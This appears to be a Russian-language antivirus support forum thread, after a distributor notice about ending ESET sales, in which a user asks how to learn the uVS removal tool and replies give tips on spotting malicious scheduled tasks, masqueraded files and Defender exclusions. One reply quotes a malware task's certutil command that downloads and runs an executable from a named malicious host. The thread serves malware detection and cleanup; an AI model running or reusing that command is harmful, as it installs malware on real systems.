Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

uVS как стать опытными пользователем этой программы. , Обучение пользования программой uVS

RSS
Добрый день. Недавно столкнулся с одним сильным вирусом майнером, который блокировал установку антивируса Nod32. Благодаря теме на форуме в разделе:установка антивируса, мне помогли решить эту проблему с помощью программы uVS, скидывая скрипты и инструкции пошаговоые. Хотелось бы самому разобраться в этой программе и как ней пользоваться, подробнее прочитать что делает каждый ее раздел. Буду рад любому ответу по поводу этой программы!) Всем добра)

Ответы

Вредоносный сайт\ресурс который антивирус ESET определяет, как: " Обнаружена атака путем подделки записей кэша ARP "
Как это выглядит в UVS.

Код
HTTPS://BESTBLUES.TECH/APP/APP.EXE
C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE


Программа показывает два объекта.
Первый это ссылка на исполняемый файл. ( что само по себе подозрительно :)
Второй путь до  директории: APPDATA с нелепой маскировкой под системный C:\Windows\System32\csrss.exe
и не менее "интеллектуальной"  маскировкой SCHEDULED.EXE   SCHEDULED.EXE планировщик...
------------
В развёрнутом виде это:

Код
Полное имя                  HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла                   HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус                   ПОДОЗРИТЕЛЬНЫЙ 
               
Сохраненная информация      на момент создания образа
Статус                      
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\


+

Код
Полное имя                  C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
Имя файла                   SCHEDULED.EXE
Тек. статус                  ПОДОЗРИТЕЛЬНЫЙ 
                                                       
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ 
Инф. о файле                Не удается найти указанный файл. 
Цифр. подпись               проверка не производилась
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла               Типичен для вирусов и троянов
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions                     "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\


Подозрительные моменты: Temp; AppData; TaskCache; Csrss и т.д.
Из интересного задействован системный: C:\WINDOWS\SYSTEM32\CERTUTIL.EXE
*Certutil.exe — это программа командной строки, которая устанавливается как часть служб сертификации.
Проверка ссылки на V.T.: https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc­86511a0e4e00248a/detection
пп7в.jpg (92.27 КБ)
Изменено: RP55 RP55 - 30.01.2021 11:58:43
...
Просмотр активности процессов и сетевой активности.

Если есть проблемы со скоростью...

Можно замерить скорость когда система работает в безопасном режиме. Например здесь: https://yandex.ru/internet/
Загружаемся в безопасном режиме и проверяем = сравниваем.
+ Учитываем - что если включено обновление системы - то...
77-88-00.jpg (103.48 КБ)
мон 2.jpg (41.51 КБ)
33-44-55.jpg (102.36 КБ)
Изменено: RP55 RP55 - 17.09.2022 14:53:04
Сейчас часто используют легальные файлы для "атаки"
Как правило это чистые файлы - но устаревшие. Например стоит современная\актуальная\обновлённая версия программы. Но ей подсовывают старый файл этой же программы ( со множеством узявимостей ) - которые и эксплуатируются.

Или есть некий старый скрипт... который всю свою сознательную :)   жизнь был чист.  Он обращался к некому сайту... Но теперь у сайта другой владелец, или сайт был взломан.
-----
Как выявить ? Как правило работают с самыми популярными ( ежедневно используемыми на PC программами ) Браузеры и т.д.
Каталог\папка с этим старым дополнением будет рядом с этой программой. В том же каталоге или рядом. Большая разница по времени между созданием\изменением файла\файлов.
Например в каталоге с файлами 2022 года файл 2010.
Если есть сомнение можно файл на время переименовать. Например с updater.dll в updater.dll111
Чаще всего эти компоненты являются библиотеками\программными дополнениями или скриптами.
Так как файл чист - то и расширение файла - как правило стандартное.
-----
Если объектов в системе слишком много - переименовать\удалить всё, что не влияет на работу системы. Всё лишнее.
+
Возможно файл запускается через задачу, или автозапуск.
Изменено: RP55 RP55 - 18.08.2022 00:11:30
Однозначно - даже не к подозрительным, к вирусом относятся  объекты которые 5; 10; 25 раз прописаны в задачах на запуск.
" Слава" "Выдающимся"  Создателям ... ( сего чуда )
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\ACTIVATIONRULE
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\Agent Activation Runtime\AGENT ACTIVATION RUNTIMESERVICES_BK796
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\AntiMalwareSericeExecutable\ANTIMALW­ARESERICEEXECUTABLESERVICES_BK656
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\ANTIMALWARESERVICEEXECUTABLE
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MICROSOFTEDGEUPD
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MicrosoftUpdateServices\MICROSOFTUPD­ATESERVICESSERVICES_BK885
                           
и т.д.
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07E64826-A11E-4A4A-853B-672E88D38A14}\Actions
Actions                     "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{07E64826-A11E-4A4A-853B-672E88D38A14}\
Task                        \Agent Activation Runtime\Agent Activation RuntimeServices_bk796
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1137A4FF-839D-41ED-B7A2-DC5ECBB3509B}\Actions
Actions                     "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1137A4FF-839D-41ED-B7A2-DC5ECBB3509B}\
Task                        \MicrosoftEdgeUpd
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1773D39D-4B62-4382-BA67-4D6A44256D80}\Actions
Actions                     "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe"
                           
и т.д.
Выявление и Удаление JS/Yandex

Например Антивирус выдаёт  оповещение  - как на снимке.

Открываем uVS и через поиск находим все записи типа: CLIENTS2.GOOGLE

и удаляем.
Скрин1.JPG (101.46 КБ)
Изменено: RP55 RP55 - 05.01.2023 16:38:28
Пример обнаружения антивирусом и лечения системы
https://forum.esetnod32.ru/messages/forum9/topic17114/message115359/#message115359
Можно найти угрозы проверяя записи защитника Windows - файлы в исключениях.
Сейчас часто можно увидеть такое ( как на фото )

---------
! Маскировка под блокировщик рекламы: Adblock.xpi   в  Adblock.exe
---------
Изменено: RP55 RP55 - 14.03.2024 16:22:56
Читают тему